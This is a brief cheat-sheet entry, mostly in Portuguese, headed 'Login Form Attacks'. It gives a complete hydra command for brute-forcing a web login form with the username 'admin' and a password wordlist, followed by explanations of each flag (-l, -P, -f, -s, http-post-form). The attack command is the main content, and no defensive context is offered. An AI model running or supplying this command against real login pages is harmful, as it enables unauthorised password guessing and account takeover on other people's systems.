Login Form Attacks

• Força bruta do formulário de login - usuário estático, lista de palavras aprovadas

hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

• -l: Nome de usuário alvo.

• -P: Arquivo contendo lista de senhas.

• -f: Parar no primeiro sucesso.

• SERVER_IP: Endereço IP do servidor alvo.

• -s PORT: Número da porta do serviço alvo.

• http-post-form: Especificação do formulário de login e critérios de sucesso.